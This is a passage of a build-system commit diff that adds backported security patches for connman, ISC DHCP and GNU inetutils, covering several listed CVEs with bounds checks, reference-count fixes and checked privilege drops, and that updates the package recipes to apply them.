7Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=72343929836de80727a27d6744c869dff045757c && https://git.kernel.org/pub/scm/network/connman/connman.git/commit/src/wispr.c?id=416bfaff988882c553c672e5bfc2d4f648d29e8a]
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/wispr.c | 83 ++++++++++++++++++++++++++++++++++++++++-------------
11 1 file changed, 63 insertions(+), 20 deletions(-)
12
13diff --git a/src/wispr.c b/src/wispr.c
14index 473c0e0..97e0242 100644
15--- a/src/wispr.c
16+++ b/src/wispr.c
17@@ -59,6 +59,7 @@ struct wispr_route {
18 };
19
20 struct connman_wispr_portal_context {
21+ int refcount;
22 struct connman_service *service;
23 enum connman_ipconfig_type type;
24 struct connman_wispr_portal *wispr_portal;
25@@ -96,10 +97,13 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data);
26
27 static GHashTable *wispr_portal_list = NULL;
28
29+#define wispr_portal_context_ref(wp_context) \
30+ wispr_portal_context_ref_debug(wp_context, __FILE__, __LINE__, __func__)
31+#define wispr_portal_context_unref(wp_context) \
32+ wispr_portal_context_unref_debug(wp_context, __FILE__, __LINE__, __func__)
33+
34 static void connman_wispr_message_init(struct connman_wispr_message *msg)
35 {
36- DBG("");
37-
38 msg->has_error = false;
39 msg->current_element = NULL;
40
41@@ -159,11 +163,6 @@ static void free_wispr_routes(struct connman_wispr_portal_context *wp_context)
42 static void free_connman_wispr_portal_context(
43 struct connman_wispr_portal_context *wp_context)
44 {
45- DBG("context %p", wp_context);
46-
47- if (!wp_context)
48- return;
49-
50 if (wp_context->wispr_portal) {
51 if (wp_context->wispr_portal->ipv4_context == wp_context)
52 wp_context->wispr_portal->ipv4_context = NULL;
53@@ -200,9 +199,38 @@ static void free_connman_wispr_portal_context(
54 g_free(wp_context);
55 }
56
57+static struct connman_wispr_portal_context *
58+wispr_portal_context_ref_debug(struct connman_wispr_portal_context *wp_context,
59+ const char *file, int line, const char *caller)
60+{
61+ DBG("%p ref %d by %s:%d:%s()", wp_context,
62+ wp_context->refcount + 1, file, line, caller);
63+
64+ __sync_fetch_and_add(&wp_context->refcount, 1);
65+
66+ return wp_context;
67+}
68+
69+static void wispr_portal_context_unref_debug(
70+ struct connman_wispr_portal_context *wp_context,
71+ const char *file, int line, const char *caller)
72+{
73+ if (!wp_context)
74+ return;
75+
76+ DBG("%p ref %d by %s:%d:%s()", wp_context,
77+ wp_context->refcount - 1, file, line, caller);
78+
79+ if (__sync_fetch_and_sub(&wp_context->refcount, 1) != 1)
80+ return;
81+
82+ free_connman_wispr_portal_context(wp_context);
83+}
84+
85 static struct connman_wispr_portal_context *create_wispr_portal_context(void)
86 {
87- return g_try_new0(struct connman_wispr_portal_context, 1);
88+ return wispr_portal_context_ref(
89+ g_new0(struct connman_wispr_portal_context, 1));
90 }
91
92 static void free_connman_wispr_portal(gpointer data)
93@@ -214,8 +242,8 @@ static void free_connman_wispr_portal(gpointer data)
94 if (!wispr_portal)
95 return;
96
97- free_connman_wispr_portal_context(wispr_portal->ipv4_context);
98- free_connman_wispr_portal_context(wispr_portal->ipv6_context);
99+ wispr_portal_context_unref(wispr_portal->ipv4_context);
100+ wispr_portal_context_unref(wispr_portal->ipv6_context);
101
102 g_free(wispr_portal);
103 }
104@@ -450,8 +478,6 @@ static void portal_manage_status(GWebResult *result,
105 &str))
106 connman_info("Client-Timezone: %s", str);
107
108- free_connman_wispr_portal_context(wp_context);
109-
110 __connman_service_ipconfig_indicate_state(service,
111 CONNMAN_SERVICE_STATE_ONLINE, type);
112 }
113@@ -509,14 +535,17 @@ static void wispr_portal_request_portal(
114 {
115 DBG("");
116
117+ wispr_portal_context_ref(wp_context);
118 wp_context->request_id = g_web_request_get(wp_context->web,
119 wp_context->status_url,
120 wispr_portal_web_result,
121 wispr_route_request,
122 wp_context);
123
124- if (wp_context->request_id == 0)
125+ if (wp_context->request_id == 0) {
126 wispr_portal_error(wp_context);
127+ wispr_portal_context_unref(wp_context);
128+ }
129 }
130
131 static bool wispr_input(const guint8 **data, gsize *length,
132@@ -562,13 +591,15 @@ static void wispr_portal_browser_reply_cb(struct connman_service *service,
133 return;
134
135 if (!authentication_done) {
136- wispr_portal_error(wp_context);
137 free_wispr_routes(wp_context);
138+ wispr_portal_error(wp_context);
139+ wispr_portal_context_unref(wp_context);
140 return;
141 }
142
143 /* Restarting the test */
144 __connman_service_wispr_start(service, wp_context->type);
145+ wispr_portal_context_unref(wp_context);
146 }
147
148 static void wispr_portal_request_wispr_login(struct connman_service *service,
149@@ -592,7 +623,7 @@ static void wispr_portal_request_wispr_login(struct connman_service *service,
150 return;
151 }
152
153- free_connman_wispr_portal_context(wp_context);
154+ wispr_portal_context_unref(wp_context);
155 return;
156 }
157
158@@ -644,11 +675,13 @@ static bool wispr_manage_message(GWebResult *result,
159
160 wp_context->wispr_result = CONNMAN_WISPR_RESULT_LOGIN;
161
162+ wispr_portal_context_ref(wp_context);
163 if (__connman_agent_request_login_input(wp_context->service,
164 wispr_portal_request_wispr_login,
165- wp_context) != -EINPROGRESS)
166+ wp_context) != -EINPROGRESS) {
167 wispr_portal_error(wp_context);
168- else
169+ wispr_portal_context_unref(wp_context);
170+ } else
171 return true;
172
173 break;
174@@ -697,6 +730,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
175 if (length > 0) {
176 g_web_parser_feed_data(wp_context->wispr_parser,
177 chunk, length);
178+ wispr_portal_context_unref(wp_context);
179 return true;
180 }
181
182@@ -714,6 +748,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
183
184 switch (status) {
185 case 000:
186+ wispr_portal_context_ref(wp_context);
187 __connman_agent_request_browser(wp_context->service,
188 wispr_portal_browser_reply_cb,
189 wp_context->status_url, wp_context);
190@@ -725,11 +760,14 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
191 if (g_web_result_get_header(result, "X-ConnMan-Status",
192 &str)) {
193 portal_manage_status(result, wp_context);
194+ wispr_portal_context_unref(wp_context);
195 return false;
196- } else
197+ } else {
198+ wispr_portal_context_ref(wp_context);
199 __connman_agent_request_browser(wp_context->service,
200 wispr_portal_browser_reply_cb,
201 wp_context->redirect_url, wp_context);
202+ }
203
204 break;
205 case 302:
206@@ -737,6 +775,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
207 !g_web_result_get_header(result, "Location",
208 &redirect)) {
209
210+ wispr_portal_context_ref(wp_context);
211 __connman_agent_request_browser(wp_context->service,
212 wispr_portal_browser_reply_cb,
213 wp_context->status_url, wp_context);
214@@ -747,6 +786,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
215
216 wp_context->redirect_url = g_strdup(redirect);
217
218+ wispr_portal_context_ref(wp_context);
219 wp_context->request_id = g_web_request_get(wp_context->web,
220 redirect, wispr_portal_web_result,
221 wispr_route_request, wp_context);
222@@ -763,6 +803,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
223
224 break;
225 case 505:
226+ wispr_portal_context_ref(wp_context);
227 __connman_agent_request_browser(wp_context->service,
228 wispr_portal_browser_reply_cb,
229 wp_context->status_url, wp_context);
230@@ -775,6 +816,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
231 wp_context->request_id = 0;
232 done:
233 wp_context->wispr_msg.message_type = -1;
234+ wispr_portal_context_unref(wp_context);
235 return false;
236 }
237
238@@ -809,6 +851,7 @@ static void proxy_callback(const char *proxy, void *user_data)
239 xml_wispr_parser_callback, wp_context);
240
241 wispr_portal_request_portal(wp_context);
242+ wispr_portal_context_unref(wp_context);
243 }
244
245 static gboolean no_proxy_callback(gpointer user_data)
246@@ -903,7 +946,7 @@ static int wispr_portal_detect(struct connman_wispr_portal_context *wp_context)
247
248 if (wp_context->token == 0) {
249 err = -EINVAL;
250- free_connman_wispr_portal_context(wp_context);
251+ wispr_portal_context_unref(wp_context);
252 }
253 } else if (wp_context->timeout == 0) {
254 wp_context->timeout = g_idle_add(no_proxy_callback, wp_context);
255@@ -952,7 +995,7 @@ int __connman_wispr_start(struct connman_service *service,
256
257 /* If there is already an existing context, we wipe it */
258 if (wp_context)
259- free_connman_wispr_portal_context(wp_context);
260+ wispr_portal_context_unref(wp_context);
261
262 wp_context = create_wispr_portal_context();
263 if (!wp_context)
264--
2652.25.1
266
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
new file mode 100644
index 0000000000..ea1601cc04
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
@@ -0,0 +1,54 @@
1From 99e2c16ea1cced34a5dc450d76287a1c3e762138 Mon Sep 17 00:00:00 2001
2From: Daniel Wagner <wagi@monom.org>
3Date: Tue, 11 Apr 2023 08:12:56 +0200
4Subject: gdhcp: Verify and sanitize packet length first
5
6Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/patch/?id=99e2c16ea1cced34a5dc450d76287a1c3e762138]
7CVE: CVE-2023-28488
8Signed-off-by: Ashish Sharma <asharma@mvista.com>
9
10 gdhcp/client.c | 16 +++++++++-------
11 1 file changed, 9 insertions(+), 7 deletions(-)
12
13diff --git a/gdhcp/client.c b/gdhcp/client.c
14index 7efa7e45..82017692 100644
15--- a/gdhcp/client.c
16+++ b/gdhcp/client.c
17@@ -1319,9 +1319,9 @@ static bool sanity_check(struct ip_udp_dhcp_packet *packet, int bytes)
18 static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
19 struct sockaddr_in *dst_addr)
20 {
21- int bytes;
22 struct ip_udp_dhcp_packet packet;
23 uint16_t check;
24+ int bytes, tot_len;
25
26 memset(&packet, 0, sizeof(packet));
27
28@@ -1329,15 +1329,17 @@ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
29 if (bytes < 0)
30 return -1;
31
32- if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
33- return -1;
34-
35- if (bytes < ntohs(packet.ip.tot_len))
36+ tot_len = ntohs(packet.ip.tot_len);
37+ if (bytes > tot_len) {
38+ /* ignore any extra garbage bytes */
39+ bytes = tot_len;
40+ } else if (bytes < tot_len) {
41 /* packet is bigger than sizeof(packet), we did partial read */
42 return -1;
43+ }
44
45- /* ignore any extra garbage bytes */
46- bytes = ntohs(packet.ip.tot_len);
47+ if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
48+ return -1;
49
50 if (!sanity_check(&packet, bytes))
51 return -1;
52--
53cgit
54
diff --git a/meta/recipes-connectivity/connman/connman_1.37.bb b/meta/recipes-connectivity/connman/connman_1.37.bb
index 00852bf0d6..8062a094d3 100644
--- a/meta/recipes-connectivity/connman/connman_1.37.bb
+++ b/meta/recipes-connectivity/connman/connman_1.37.bb
@@ -6,6 +6,15 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/network/${BPN}/${BP}.tar.xz \
6 file://0001-gweb-fix-segfault-with-musl-v1.1.21.patch \ 6 file://0001-gweb-fix-segfault-with-musl-v1.1.21.patch \
7 file://connman \ 7 file://connman \
8 file://no-version-scripts.patch \ 8 file://no-version-scripts.patch \
9 file://CVE-2021-26675.patch \
10 file://CVE-2021-26676-0001.patch \
11 file://CVE-2021-26676-0002.patch \
12 file://CVE-2021-33833.patch \
13 file://CVE-2022-23096-7.patch \
14 file://CVE-2022-23098.patch \
15 file://CVE-2022-32292.patch \
16 file://CVE-2022-32293.patch \
17 file://CVE-2023-28488.patch \
9" 18"
10 19
11SRC_URI_append_libc-musl = " file://0002-resolve-musl-does-not-implement-res_ninit.patch" 20SRC_URI_append_libc-musl = " file://0002-resolve-musl-does-not-implement-res_ninit.patch"
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
new file mode 100644
index 0000000000..91aaf83a77
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
@@ -0,0 +1,66 @@
1From 5a7344b05081d84343a1627e47478f3990b17700 Mon Sep 17 00:00:00 2001
2From: Minjae Kim <flowergom@gmail.com>
3Date: Thu, 8 Jul 2021 00:08:25 +0000
4Subject: [PATCH] ISC has disclosed a vulnerability in ISC DHCP
5 (CVE-2021-25217)
6
7On May 26, 2021, we (Internet Systems Consortium) disclosed a
8vulnerability affecting our ISC DHCP software:
9
10 CVE-2021-25217: A buffer overrun in lease file parsing code can be
11 used to exploit a common vulnerability shared by dhcpd and dhclient
12 https://kb.isc.org/docs/cve-2021-25217
13
14New versions of ISC DHCP are available from https://www.isc.org/downloads
15
16Operators and package maintainers who prefer to apply patches selectively can
17find individual vulnerability-specific patches in the "patches" subdirectory
18of the release directories for our two stable release branches (4.4 and 4.1-ESV)
19
20 https://downloads.isc.org/isc/dhcp/4.4.2-P1/patches
21 https://downloads.isc.org/isc/dhcp/4.1-ESV-R16-P1/patches
22
23With the public announcement of this vulnerability, the embargo
24period is ended and any updated software packages that have been
25prepared may be released.
26
27Upstream-Status: Accepted [https://www.openwall.com/lists/oss-security/2021/05/26/6]
28CVE: CVE-2021-25217
29Signed-off-by: Minjae Kim <flowergom@gmail.com>
30---
31 common/parse.c | 7 ++++---
32 1 file changed, 4 insertions(+), 3 deletions(-)
33
34diff --git a/common/parse.c b/common/parse.c
35index 386a632..fc7b39c 100644
36--- a/common/parse.c
37+++ b/common/parse.c
38@@ -3,7 +3,7 @@
39 Common parser code for dhcpd and dhclient. */
40
41 /*
42- * Copyright (c) 2004-2019 by Internet Systems Consortium, Inc. ("ISC")
43+ * Copyright (c) 2004-2021 by Internet Systems Consortium, Inc. ("ISC")
44 * Copyright (c) 1995-2003 by Internet Software Consortium
45 *
46 * This Source Code Form is subject to the terms of the Mozilla Public
47@@ -5556,13 +5556,14 @@ int parse_X (cfile, buf, max)
48 skip_to_semi (cfile);
49 return 0;
50 }
51- convert_num (cfile, &buf [len], val, 16, 8);
52- if (len++ > max) {
53+ if (len >= max) {
54 parse_warn (cfile,
55 "hexadecimal constant too long.");
56 skip_to_semi (cfile);
57 return 0;
58 }
59+ convert_num (cfile, &buf [len], val, 16, 8);
60+ len++;
61 token = peek_token (&val, (unsigned *)0, cfile);
62 if (token == COLON)
63 token = next_token (&val,
64--
652.17.1
66
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
new file mode 100644
index 0000000000..11f162cbda
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
@@ -0,0 +1,120 @@
1From 8a5d739eea10ee6e193f053b1662142d5657cbc6 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 6 Oct 2022 09:39:18 +0530
4Subject: [PATCH] CVE-2022-2928
5
6Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
7CVE: CVE-2022-2928
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 common/options.c | 7 +++++
11 common/tests/option_unittest.c | 54 ++++++++++++++++++++++++++++++++++
12 2 files changed, 61 insertions(+)
13
14diff --git a/common/options.c b/common/options.c
15index a7ed84c..4e53bb4 100644
16--- a/common/options.c
17+++ b/common/options.c
18@@ -4452,6 +4452,8 @@ add_option(struct option_state *options,
19 if (!option_cache_allocate(&oc, MDL)) {
20 log_error("No memory for option cache adding %s (option %d).",
21 option->name, option_num);
22+ /* Get rid of reference created during hash lookup. */
23+ option_dereference(&option, MDL);
24 return 0;
25 }
26
27@@ -4463,6 +4465,8 @@ add_option(struct option_state *options,
28 MDL)) {
29 log_error("No memory for constant data adding %s (option %d).",
30 option->name, option_num);
31+ /* Get rid of reference created during hash lookup. */
32+ option_dereference(&option, MDL);
33 option_cache_dereference(&oc, MDL);
34 return 0;
35 }
36@@ -4471,6 +4475,9 @@ add_option(struct option_state *options,
37 save_option(&dhcp_universe, options, oc);
38 option_cache_dereference(&oc, MDL);
39
40+ /* Get rid of reference created during hash lookup. */
41+ option_dereference(&option, MDL);
42+
43 return 1;
44 }
45
46diff --git a/common/tests/option_unittest.c b/common/tests/option_unittest.c
47index cd52cfb..690704d 100644
48--- a/common/tests/option_unittest.c
49+++ b/common/tests/option_unittest.c
50@@ -130,6 +130,59 @@ ATF_TC_BODY(pretty_print_option, tc)
51 }
52
53
54+ATF_TC(add_option_ref_cnt);
55+
56+ATF_TC_HEAD(add_option_ref_cnt, tc)
57+{
58+ atf_tc_set_md_var(tc, "descr",
59+ "Verify add_option() does not leak option ref counts.");
60+}
61+
62+ATF_TC_BODY(add_option_ref_cnt, tc)
63+{
64+ struct option_state *options = NULL;
65+ struct option *option = NULL;
66+ unsigned int cid_code = DHO_DHCP_CLIENT_IDENTIFIER;
67+ char *cid_str = "1234";
68+ int refcnt_before = 0;
69+
70+ // Look up the option we're going to add.
71+ initialize_common_option_spaces();
72+ if (!option_code_hash_lookup(&option, dhcp_universe.code_hash,
73+ &cid_code, 0, MDL)) {
74+ atf_tc_fail("cannot find option definition?");
75+ }
76+
77+ // Get the option's reference count before we call add_options.
78+ refcnt_before = option->refcnt;
79+
80+ // Allocate a option_state to which to add an option.
81+ if (!option_state_allocate(&options, MDL)) {
82+ atf_tc_fail("cannot allocat options state");
83+ }
84+
85+ // Call add_option() to add the option to the option state.
86+ if (!add_option(options, cid_code, cid_str, strlen(cid_str))) {
87+ atf_tc_fail("add_option returned 0");
88+ }
89+
90+ // Verify that calling add_option() only adds 1 to the option ref count.
91+ if (option->refcnt != (refcnt_before + 1)) {
92+ atf_tc_fail("after add_option(), count is wrong, before %d, after: %d",
93+ refcnt_before, option->refcnt);
94+ }
95+
96+ // Derefrence the option_state, this should reduce the ref count to
97+ // it's starting value.
98+ option_state_dereference(&options, MDL);
99+
100+ // Verify that dereferencing option_state restores option ref count.
101+ if (option->refcnt != refcnt_before) {
102+ atf_tc_fail("after state deref, count is wrong, before %d, after: %d",
103+ refcnt_before, option->refcnt);
104+ }
105+}
106+
107 /* This macro defines main() method that will call specified
108 test cases. tp and simple_test_case names can be whatever you want
109 as long as it is a valid variable identifier. */
110@@ -137,6 +190,7 @@ ATF_TP_ADD_TCS(tp)
111 {
112 ATF_TP_ADD_TC(tp, option_refcnt);
113 ATF_TP_ADD_TC(tp, pretty_print_option);
114+ ATF_TP_ADD_TC(tp, add_option_ref_cnt);
115
116 return (atf_no_error());
117 }
118--
1192.25.1
120
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
new file mode 100644
index 0000000000..d605204f89
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
@@ -0,0 +1,40 @@
1From 5c959166ebee7605e2048de573f2475b4d731ff7 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 6 Oct 2022 09:42:59 +0530
4Subject: [PATCH] CVE-2022-2929
5
6Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
7CVE: CVE-2022-2929
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 common/options.c | 8 ++++----
11 1 file changed, 4 insertions(+), 4 deletions(-)
12
13diff --git a/common/options.c b/common/options.c
14index 4e53bb4..28800fc 100644
15--- a/common/options.c
16+++ b/common/options.c
17@@ -454,16 +454,16 @@ int fqdn_universe_decode (struct option_state *options,
18 while (s < &bp -> data[0] + length + 2) {
19 len = *s;
20 if (len > 63) {
21- log_info ("fancy bits in fqdn option");
22- return 0;
23+ log_info ("label length exceeds 63 in fqdn option");
24+ goto bad;
25 }
26 if (len == 0) {
27 terminated = 1;
28 break;
29 }
30 if (s + len > &bp -> data [0] + length + 3) {
31- log_info ("fqdn tag longer than buffer");
32- return 0;
33+ log_info ("fqdn label longer than buffer");
34+ goto bad;
35 }
36
37 if (first_len == 0) {
38--
392.25.1
40
diff --git a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
index b56a204821..d3c87d0d07 100644
--- a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
+++ b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
@@ -10,6 +10,9 @@ SRC_URI += "file://0001-define-macro-_PATH_DHCPD_CONF-and-_PATH_DHCLIENT_CON.pat
10 file://0012-dhcp-correct-the-intention-for-xml2-lib-search.patch \ 10 file://0012-dhcp-correct-the-intention-for-xml2-lib-search.patch \
11 file://0013-fixup_use_libbind.patch \ 11 file://0013-fixup_use_libbind.patch \
12 file://0001-workaround-busybox-limitation-in-linux-dhclient-script.patch \ 12 file://0001-workaround-busybox-limitation-in-linux-dhclient-script.patch \
13 file://CVE-2021-25217.patch \
14 file://CVE-2022-2928.patch \
15 file://CVE-2022-2929.patch \
13" 16"
14 17
15SRC_URI[md5sum] = "2afdaf8498dc1edaf3012efdd589b3e1" 18SRC_URI[md5sum] = "2afdaf8498dc1edaf3012efdd589b3e1"
diff --git a/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
new file mode 100644
index 0000000000..aea07bd803
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
@@ -0,0 +1,283 @@
1From 703418fe9d2e3b1e8d594df5788d8001a8116265 Mon Sep 17 00:00:00 2001
2From: Jeffrey Bencteux <jeffbencteux@gmail.com>
3Date: Fri, 30 Jun 2023 19:02:45 +0200
4Subject: [PATCH] CVE-2023-40303: ftpd,rcp,rlogin,rsh,rshd,uucpd: fix: check
5 set*id() return values
6
7Several setuid(), setgid(), seteuid() and setguid() return values
8were not checked in ftpd/rcp/rlogin/rsh/rshd/uucpd code potentially
9leading to potential security issues.
10
11CVE: CVE-2023-40303
12Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=e4e65c03f4c11292a3e40ef72ca3f194c8bffdd6]
13Signed-off-by: Jeffrey Bencteux <jeffbencteux@gmail.com>
14Signed-off-by: Simon Josefsson <simon@josefsson.org>
15Signed-off-by: Khem Raj <raj.khem@gmail.com>
16Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
17---
18 ftpd/ftpd.c | 10 +++++++---
19 src/rcp.c | 39 +++++++++++++++++++++++++++++++++------
20 src/rlogin.c | 11 +++++++++--
21 src/rsh.c | 25 +++++++++++++++++++++----
22 src/rshd.c | 20 +++++++++++++++++---
23 src/uucpd.c | 15 +++++++++++++--
24 6 files changed, 100 insertions(+), 20 deletions(-)
25
26diff --git a/ftpd/ftpd.c b/ftpd/ftpd.c
27index 5db88d0..b52b122 100644
28--- a/ftpd/ftpd.c
29+++ b/ftpd/ftpd.c
30@@ -862,7 +862,9 @@ end_login (struct credentials *pcred)
31 char *remotehost = pcred->remotehost;
32 int atype = pcred->auth_type;
33
34- seteuid ((uid_t) 0);
35+ if (seteuid ((uid_t) 0) == -1)
36+ _exit (EXIT_FAILURE);
37+
38 if (pcred->logged_in)
39 {
40 logwtmp_keep_open (ttyline, "", "");
41@@ -1151,7 +1153,8 @@ getdatasock (const char *mode)
42
43 if (data >= 0)
44 return fdopen (data, mode);
45- seteuid ((uid_t) 0);
46+ if (seteuid ((uid_t) 0) == -1)
47+ _exit (EXIT_FAILURE);
48 s = socket (ctrl_addr.ss_family, SOCK_STREAM, 0);
49 if (s < 0)
50 goto bad;
51@@ -1978,7 +1981,8 @@ passive (int epsv, int af)
52 else /* !AF_INET6 */
53 ((struct sockaddr_in *) &pasv_addr)->sin_port = 0;
54
55- seteuid ((uid_t) 0);
56+ if (seteuid ((uid_t) 0) == -1)
57+ _exit (EXIT_FAILURE);
58 if (bind (pdata, (struct sockaddr *) &pasv_addr, pasv_addrlen) < 0)
59 {
60 if (seteuid ((uid_t) cred.uid))
61diff --git a/src/rcp.c b/src/rcp.c
62index bafa35f..366295c 100644
63--- a/src/rcp.c
64+++ b/src/rcp.c
65@@ -347,14 +347,23 @@ main (int argc, char *argv[])
66 if (from_option)
67 { /* Follow "protocol", send data. */
68 response ();
69- setuid (userid);
70+
71+ if (setuid (userid) == -1)
72+ {
73+ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
74+ }
75+
76 source (argc, argv);
77 exit (errs);
78 }
79
80 if (to_option)
81 { /* Receive data. */
82- setuid (userid);
83+ if (setuid (userid) == -1)
84+ {
85+ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
86+ }
87+
88 sink (argc, argv);
89 exit (errs);
90 }
91@@ -539,7 +548,11 @@ toremote (char *targ, int argc, char *argv[])
92 if (response () < 0)
93 exit (EXIT_FAILURE);
94 free (bp);
95- setuid (userid);
96+
97+ if (setuid (userid) == -1)
98+ {
99+ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
100+ }
101 }
102 source (1, argv + i);
103 close (rem);
104@@ -634,7 +647,12 @@ tolocal (int argc, char *argv[])
105 ++errs;
106 continue;
107 }
108- seteuid (userid);
109+
110+ if (seteuid (userid) == -1)
111+ {
112+ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
113+ }
114+
115 #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
116 sslen = sizeof (ss);
117 (void) getpeername (rem, (struct sockaddr *) &ss, &sslen);
118@@ -647,7 +665,12 @@ tolocal (int argc, char *argv[])
119 #endif
120 vect[0] = target;
121 sink (1, vect);
122- seteuid (effuid);
123+
124+ if (seteuid (effuid) == -1)
125+ {
126+ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
127+ }
128+
129 close (rem);
130 rem = -1;
131 #ifdef SHISHI
132@@ -1453,7 +1476,11 @@ susystem (char *s, int userid)
133 return (127);
134
135 case 0:
136- setuid (userid);
137+ if (setuid (userid) == -1)
138+ {
139+ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
140+ }
141+
142 execl (PATH_BSHELL, "sh", "-c", s, NULL);
143 _exit (127);
144 }
145diff --git a/src/rlogin.c b/src/rlogin.c
146index e5e11a7..6b38901 100644
147--- a/src/rlogin.c
148+++ b/src/rlogin.c
149@@ -649,8 +649,15 @@ try_connect:
150 /* Now change to the real user ID. We have to be set-user-ID root
151 to get the privileged port that rcmd () uses. We now want, however,
152 to run as the real user who invoked us. */
153- seteuid (uid);
154- setuid (uid);
155+ if (seteuid (uid) == -1)
156+ {
157+ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
158+ }
159+
160+ if (setuid (uid) == -1)
161+ {
162+ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
163+ }
164
165 doit (&osmask); /* The old mask will activate SIGURG and SIGUSR1! */
166
167diff --git a/src/rsh.c b/src/rsh.c
168index bd70372..b451a70 100644
169--- a/src/rsh.c
170+++ b/src/rsh.c
171@@ -278,8 +278,17 @@ main (int argc, char **argv)
172 {
173 if (asrsh)
174 *argv = (char *) "rlogin";
175- seteuid (getuid ());
176- setuid (getuid ());
177+
178+ if (seteuid (getuid ()) == -1)
179+ {
180+ error (EXIT_FAILURE, errno, "seteuid() failed");
181+ }
182+
183+ if (setuid (getuid ()) == -1)
184+ {
185+ error (EXIT_FAILURE, errno, "setuid() failed");
186+ }
187+
188 execv (PATH_RLOGIN, argv);
189 error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
190 }
191@@ -543,8 +552,16 @@ try_connect:
192 error (0, errno, "setsockopt DEBUG (ignored)");
193 }
194
195- seteuid (uid);
196- setuid (uid);
197+ if (seteuid (uid) == -1)
198+ {
199+ error (EXIT_FAILURE, errno, "seteuid() failed");
200+ }
201+
202+ if (setuid (uid) == -1)
203+ {
204+ error (EXIT_FAILURE, errno, "setuid() failed");
205+ }
206+
207 #ifdef HAVE_SIGACTION
208 sigemptyset (&sigs);
209 sigaddset (&sigs, SIGINT);
210diff --git a/src/rshd.c b/src/rshd.c
211index b824a10..8cdcd06 100644
212--- a/src/rshd.c
213+++ b/src/rshd.c
214@@ -1848,8 +1848,18 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
215 pwd->pw_shell = PATH_BSHELL;
216
217 /* Set the gid, then uid to become the user specified by "locuser" */
218- setegid ((gid_t) pwd->pw_gid);
219- setgid ((gid_t) pwd->pw_gid);
220+ if (setegid ((gid_t) pwd->pw_gid) == -1)
221+ {
222+ rshd_error ("Cannot drop privileges (setegid() failed)\n");
223+ exit (EXIT_FAILURE);
224+ }
225+
226+ if (setgid ((gid_t) pwd->pw_gid) == -1)
227+ {
228+ rshd_error ("Cannot drop privileges (setgid() failed)\n");
229+ exit (EXIT_FAILURE);
230+ }
231+
232 #ifdef HAVE_INITGROUPS
233 initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */
234 #endif
235@@ -1871,7 +1881,11 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
236 }
237 #endif /* WITH_PAM */
238
239- setuid ((uid_t) pwd->pw_uid);
240+ if (setuid ((uid_t) pwd->pw_uid) == -1)
241+ {
242+ rshd_error ("Cannot drop privileges (setuid() failed)\n");
243+ exit (EXIT_FAILURE);
244+ }
245
